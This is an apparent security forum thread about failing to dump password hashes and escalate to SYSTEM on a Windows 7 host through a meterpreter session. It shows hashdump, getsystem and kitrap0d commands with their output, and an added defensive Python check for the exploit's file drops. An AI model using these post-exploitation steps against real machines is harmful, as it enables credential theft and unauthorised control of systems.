
Thread: unable to dump hashes in win7 with meterpreter

  1. #1
    Member
    Join Date
    Sep 2007
    Posts
    58

    Default unable to dump hashes in win7 with meterpreter

    I got a meterpreter session on a Win7 box; however, I'm unable to use hashdump. I get insufficient privileges. So I tried to use the "keylogrecorder" script, but I need to migrate to winlogon.exe for that, and again, I'm unable to migrate due to insufficient privs. I used "getprivs" and then tried again with the same results. I noticed that "getsystem" is not available. The user that I got my meterpreter session as is a member of the admin group, yet I'm not able to get any of these commands working. I know in Vista there's UAC, which can be turned off, but I'm not aware of this in Win7. Any help appreciated.

    thanks

  2. #2
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: unable to dump hashes in win7 with meterpreter

    Did you load the priv extension?

    Code:
    meterpreter> use priv
    ..snip..
    Code:
    meterpreter> hashdump
    ...snip...
    or

    Code:
    meterpreter> run hashdump
    ..snip...
    Also try:

    Code:
    meterpreter> run kitrap0d
    ...snip...
    Regards,
    (gdb) disass m(y_br)ain


  3. #3
    Member
    Join Date
    Sep 2007
    Posts
    58

    Default Re: unable to dump hashes in win7 with meterpreter

    Code:
    meterpreter > use priv
    Loading extension priv...success.

    Code:
    meterpreter > run hashdump
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY b9106b7575965755275b237fe2b54acd...
    [-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5
    [-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
    meterpreter >
    I tried to migrate to a service process, but it would not let me. By the way, this does not work with "explorer.exe"; it needs to be a process running under "system".

    Code:
    meterpreter > run kitrap0d
    [*] Currently running as vista-vbox\jorge
    [*] Loading the vdmallowed executable and DLL from the local system...
    [*] Uploading vdmallowed to C:\Users\jorge\AppData\Local\Temp\pWEXvURb.exe...
    [*] Uploading vdmallowed to C:\Users\jorge\AppData\Local\Temp\vdmexploit.dll...
    [*] Escalating our process (PID:3848)...
    And kitrap0d terminated my meterpreter session; it restarted the box!

    By the way, UAC does exist in Win7... forgot! And I read somewhere there is a script to turn it off...
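
Added example (not part of the thread and not Metasploit code): a defender-side check for the file-drop pattern visible in the kitrap0d output in post #3, where a random-named EXE and a DLL land in the same user Temp directory moments apart. It assumes file-creation telemetry is available as (timestamp, writing process, path) tuples; the timestamps, the writing process names and the last two events are constructed.

```python
import re
from datetime import datetime, timedelta
from ntpath import basename, dirname

# Constructed file-creation events (timestamp, writing process, created path).
# Only the first two target paths come from the kitrap0d output in post #3.
SAMPLE_EVENTS = [
    ("2010-11-30T21:14:02", r"C:\Program Files\App\reader.exe",
     r"C:\Users\jorge\AppData\Local\Temp\pWEXvURb.exe"),
    ("2010-11-30T21:14:03", r"C:\Program Files\App\reader.exe",
     r"C:\Users\jorge\AppData\Local\Temp\vdmexploit.dll"),
    ("2010-11-30T21:20:00", r"C:\Windows\System32\msiexec.exe",
     r"C:\Users\jorge\AppData\Local\Temp\setup.log"),
    ("2010-11-30T22:00:00", r"C:\Program Files\App\updater.exe",
     r"C:\Users\anna\AppData\Local\Temp\update.exe"),
]

TEMP_DIR = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp$", re.I)
RANDOM_EXE = re.compile(r"^[A-Za-z]{8}\.exe$")  # shape of pWEXvURb.exe
KNOWN_DLL = "vdmexploit.dll"                     # name shown in the post


def find_staged_drops(events, window=timedelta(seconds=60)):
    """Alert when one process writes a random-named EXE and a DLL into the
    same user Temp directory within `window` of each other."""
    parsed = sorted((datetime.fromisoformat(ts), proc, path)
                    for ts, proc, path in events)
    alerts = []
    for t_exe, proc, exe_path in parsed:
        folder = dirname(exe_path)
        if not (TEMP_DIR.search(folder) and RANDOM_EXE.match(basename(exe_path))):
            continue
        for t_dll, proc2, dll_path in parsed:
            if (proc2 == proc
                    and dirname(dll_path).lower() == folder.lower()
                    and dll_path.lower().endswith(".dll")
                    and abs(t_dll - t_exe) <= window):
                known = basename(dll_path).lower() == KNOWN_DLL
                alerts.append({"process": proc, "exe": exe_path,
                               "dll": dll_path,
                               "severity": "high" if known else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in find_staged_drops(SAMPLE_EVENTS):
        print(alert)
```

The pairing rule still fires at medium severity if the DLL is renamed; the literal file name only raises the severity.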

  4. #4
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: unable to dump hashes in win7 with meterpreter

    Anyone actually get this to work? I have seen things on the web saying "it works", but I have not seen that. With a Win7 install on VMware I am not able to get system privs at all, and kitrap0d will blue screen the system most times.

    However, any attempt to run escalation is a no go.

    Has anyone successfully used meterpreter to escalate to system on a retail build of Windows 7? (Wondering if I am stumped or missing something easy.)
    Code:
    meterpreter > sysinfo
    Computer: WIN-MSUB6TKFKFA
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: en_US
    meterpreter > ps
    ...
    608   explorer.exe         x86   1        WIN-MSUB6TKFKFA\user  C:\Windows\Explorer.EXE
    meterpreter > migrate 608
    [*] Migrating to 608...
    [*] Migration completed successfully.
    meterpreter > getprivs
    ============================================================
    Enabled Process Privileges
    ============================================================
      SeShutdownPrivilege
      SeChangeNotifyPrivilege
      SeUndockPrivilege
    meterpreter > getsystem -t 1
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 2
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 3
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 4
    ^C[-] Error running command getsystem: Interrupt
    Update: this is UAC blocking access; with UAC disabled this is no longer an issue. I am still stuck on how to disable UAC..?
    Last edited by spudgunman; 12-01-2010 at 06:53 AM.
